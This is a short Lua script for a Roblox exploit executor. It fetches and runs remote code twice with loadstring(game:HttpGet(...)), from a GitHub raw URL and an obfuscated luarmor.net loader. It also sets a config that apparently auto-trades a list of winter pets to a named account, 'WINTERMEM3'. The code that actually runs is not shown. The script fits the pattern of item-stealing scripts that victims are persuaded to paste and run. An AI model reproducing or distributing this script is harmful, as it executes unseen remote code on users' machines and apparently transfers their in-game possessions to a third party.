loadstring(game:HttpGet("https://raw.githubusercontent.com/Draculakemse/damnghes/refs/heads/main/uilib.lua"))()
    task.spawn(function()
        getgenv().Config = {
            ["inventory"] = "pets", -- Adapt to stickers, gifts, toys, pet_accessories, transport
            ["username"] = "WINTERMEM3",
            ["pets_to_trade"] = {"winter_2024_bauble_buddies", "winter_2024_ratatoskr", "winter_2024_cold_cube", "winter_2024_berry_cool_cube", "winter_2024_ice_cube"} -- or lures_2023_blazing_lion cant auto trade gifts with pet ONLY 1
        }
        getgenv().trade_status = true
        getgenv().pets_unique_ids = {}
    
        loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/a5386bfa9bb03ae1da997e3078394366.lua"))()
    end)
